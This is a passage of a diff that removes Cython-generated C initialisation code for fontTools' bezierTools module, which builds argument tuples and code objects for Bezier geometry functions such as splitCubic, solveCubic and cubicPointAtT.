__pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__30); - __Pyx_GIVEREF(__pyx_tuple__30); - __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__30, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateCubicArcLength, 332, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(0, 332, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__32 = PyTuple_Pack(9, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_v0, __pyx_n_s_v1, __pyx_n_s_v2, __pyx_n_s_v3, __pyx_n_s_v4); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__32); - 
__Pyx_GIVEREF(__pyx_tuple__32); - __pyx_codeobj__33 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateCubicArcLengthC, 362, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__33)) __PYX_ERR(0, 362, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_tuple__34 = PyTuple_Pack(23, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_ax3, __pyx_n_s_ay3, __pyx_n_s_bx2, __pyx_n_s_by2, __pyx_n_s_xRoots, __pyx_n_s_yRoots, __pyx_n_s_roots, __pyx_n_s_points, __pyx_n_s_t, __pyx_n_s_t, __pyx_n_s_t); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__34); - __Pyx_GIVEREF(__pyx_tuple__34); - __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 23, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__34, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicBounds, 412, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(0, 412, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. 
- * - */ - __pyx_tuple__36 = PyTuple_Pack(15, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_pt1x, __pyx_n_s_pt1y, __pyx_n_s_pt2x, __pyx_n_s_pt2y, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_a, __pyx_n_s_t, __pyx_n_s_midPt); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__36); - __Pyx_GIVEREF(__pyx_tuple__36); - __pyx_codeobj__37 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 15, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__36, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitLine, 450, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__37)) __PYX_ERR(0, 450, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - __pyx_tuple__38 = PyTuple_Pack(11, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_solutions, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__38); - __Pyx_GIVEREF(__pyx_tuple__38); - __pyx_codeobj__39 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 11, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__38, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadratic, 507, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__39)) __PYX_ERR(0, 507, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. 
- * - */ - __pyx_tuple__40 = PyTuple_Pack(13, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_solutions, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__40); - __Pyx_GIVEREF(__pyx_tuple__40); - __pyx_codeobj__41 = (PyObject*)__Pyx_PyCode_New(6, 0, 0, 13, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__40, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubic, 552, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__41)) __PYX_ERR(0, 552, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. - * - */ - __pyx_tuple__42 = PyTuple_Pack(7, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_ts, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c); if (unlikely(!__pyx_tuple__42)) __PYX_ERR(0, 589, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__42); - __Pyx_GIVEREF(__pyx_tuple__42); - __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__42, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadraticAtT_2, 589, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(0, 589, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. 
- * - */ - __pyx_tuple__44 = PyTuple_Pack(9, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_ts, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d); if (unlikely(!__pyx_tuple__44)) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__44); - __Pyx_GIVEREF(__pyx_tuple__44); - __pyx_codeobj__45 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__44, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtT_2, 613, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__45)) __PYX_ERR(0, 613, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - __pyx_codeobj_ = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS|CO_GENERATOR, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__44, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtTC, 637, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj_)) __PYX_ERR(0, 637, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_tuple__46 = PyTuple_Pack(12, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2, __pyx_n_s_2_t_1_t, __pyx_n_s_pointAtT, __pyx_n_s_off1, __pyx_n_s_off2); if (unlikely(!__pyx_tuple__46)) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__46); - __Pyx_GIVEREF(__pyx_tuple__46); - __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 12, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, 
__pyx_n_s_splitCubicIntoTwoAtTC, 661, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(0, 661, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - __pyx_tuple__48 = PyTuple_Pack(26, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_ts, __pyx_n_s_segments, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_i, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_a1x, __pyx_n_s_a1y, __pyx_n_s_b1x, __pyx_n_s_b1y, __pyx_n_s_t1_2, __pyx_n_s_c1x, __pyx_n_s_c1y, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__48); - __Pyx_GIVEREF(__pyx_tuple__48); - __pyx_codeobj__49 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 26, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__48, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadraticAtT, 701, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__49)) __PYX_ERR(0, 701, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - __pyx_tuple__50 = PyTuple_Pack(34, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_ts, __pyx_n_s_segments, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_i, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_delta_3, __pyx_n_s_t1_2, __pyx_n_s_t1_3, __pyx_n_s_a1x, __pyx_n_s_a1y, __pyx_n_s_b1x, __pyx_n_s_b1y, __pyx_n_s_c1x, __pyx_n_s_c1y, __pyx_n_s_d1x, __pyx_n_s_d1y, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__50)) __PYX_ERR(0, 728, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_tuple__50); - __Pyx_GIVEREF(__pyx_tuple__50); - __pyx_codeobj__51 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 34, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtT, 728, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__51)) __PYX_ERR(0, 728, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - __pyx_tuple__52 = PyTuple_Pack(21, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_ts, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_delta_3, __pyx_n_s_a1, __pyx_n_s_b1, __pyx_n_s_c1, __pyx_n_s_d1, __pyx_n_s_i, __pyx_n_s_t1_2, __pyx_n_s_t1_3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__52); - __Pyx_GIVEREF(__pyx_tuple__52); - __pyx_codeobj__3 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 21, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS|CO_GENERATOR, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtTC_2, 763, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__3)) __PYX_ERR(0, 763, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. 
- * - */ - __pyx_tuple__53 = PyTuple_Pack(7, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_sqrt, __pyx_n_s_roots, __pyx_n_s_DD, __pyx_n_s_rDD); if (unlikely(!__pyx_tuple__53)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__53); - __Pyx_GIVEREF(__pyx_tuple__53); - __pyx_codeobj__54 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__53, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_solveQuadratic, 808, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__54)) __PYX_ERR(0, 808, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. - * - */ - __pyx_tuple__55 = PyTuple_Pack(19, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_a1, __pyx_n_s_a2, __pyx_n_s_a3, __pyx_n_s_Q, __pyx_n_s_R, __pyx_n_s_R2, __pyx_n_s_Q3, __pyx_n_s_R2_Q3, __pyx_n_s_x, __pyx_n_s_theta, __pyx_n_s_rQ2, __pyx_n_s_a1_3, __pyx_n_s_x0, __pyx_n_s_x1, __pyx_n_s_x2); if (unlikely(!__pyx_tuple__55)) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__55); - __Pyx_GIVEREF(__pyx_tuple__55); - __pyx_codeobj__56 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 19, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__55, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_solveCubic, 841, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__56)) __PYX_ERR(0, 841, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_tuple__57 = PyTuple_Pack(13, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_ax, __pyx_n_s_ay); if 
(unlikely(!__pyx_tuple__57)) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__57); - __Pyx_GIVEREF(__pyx_tuple__57); - __pyx_codeobj__58 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 13, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__57, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticParameters, 938, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__58)) __PYX_ERR(0, 938, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_tuple__59 = PyTuple_Pack(18, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_x4, __pyx_n_s_y4, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_ax, __pyx_n_s_ay); if (unlikely(!__pyx_tuple__59)) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__59); - __Pyx_GIVEREF(__pyx_tuple__59); - __pyx_codeobj__60 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 18, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__59, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicParameters, 949, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__60)) __PYX_ERR(0, 949, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_tuple__61 = PyTuple_Pack(15, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_x1, __pyx_n_s_y1, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3); if (unlikely(!__pyx_tuple__61)) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__61); - __Pyx_GIVEREF(__pyx_tuple__61); - 
__pyx_codeobj__62 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 15, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__61, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticPoints, 981, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__62)) __PYX_ERR(0, 981, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_tuple__63 = PyTuple_Pack(20, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_x1, __pyx_n_s_y1, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_x4, __pyx_n_s_y4); if (unlikely(!__pyx_tuple__63)) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__63); - __Pyx_GIVEREF(__pyx_tuple__63); - __pyx_codeobj__64 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 20, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__63, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicPoints, 994, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__64)) __PYX_ERR(0, 994, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. 
- * - */ - __pyx_tuple__65 = PyTuple_Pack(3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_t); if (unlikely(!__pyx_tuple__65)) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__65); - __Pyx_GIVEREF(__pyx_tuple__65); - __pyx_codeobj__66 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__65, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_linePointAtT, 1033, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__66)) __PYX_ERR(0, 1033, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. - * - */ - __pyx_tuple__67 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_t, __pyx_n_s_x, __pyx_n_s_y); if (unlikely(!__pyx_tuple__67)) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__67); - __Pyx_GIVEREF(__pyx_tuple__67); - __pyx_codeobj__68 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__67, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_quadraticPointAtT, 1046, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__68)) __PYX_ERR(0, 1046, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. 
- * - */ - __pyx_tuple__69 = PyTuple_Pack(10, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2, __pyx_n_s_x, __pyx_n_s_y); if (unlikely(!__pyx_tuple__69)) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__69); - __Pyx_GIVEREF(__pyx_tuple__69); - __pyx_codeobj__70 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__69, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_cubicPointAtT, 1061, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__70)) __PYX_ERR(0, 1061, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_tuple__71 = PyTuple_Pack(8, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2); if (unlikely(!__pyx_tuple__71)) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__71); - __Pyx_GIVEREF(__pyx_tuple__71); - __pyx_codeobj__72 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__71, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_cubicPointAtTC, 1087, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__72)) __PYX_ERR(0, 1087, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - __pyx_tuple__73 = PyTuple_Pack(2, __pyx_n_s_seg, __pyx_n_s_t); if (unlikely(!__pyx_tuple__73)) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__73); - __Pyx_GIVEREF(__pyx_tuple__73); - __pyx_codeobj__74 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, 
__pyx_empty_tuple, __pyx_tuple__73, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentPointAtT, 1112, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__74)) __PYX_ERR(0, 1112, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - __pyx_tuple__75 = PyTuple_Pack(9, __pyx_n_s_s, __pyx_n_s_e, __pyx_n_s_pt, __pyx_n_s_sx, __pyx_n_s_sy, __pyx_n_s_ex, __pyx_n_s_ey, __pyx_n_s_px, __pyx_n_s_py); if (unlikely(!__pyx_tuple__75)) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__75); - __Pyx_GIVEREF(__pyx_tuple__75); - __pyx_codeobj__76 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 9, 0, 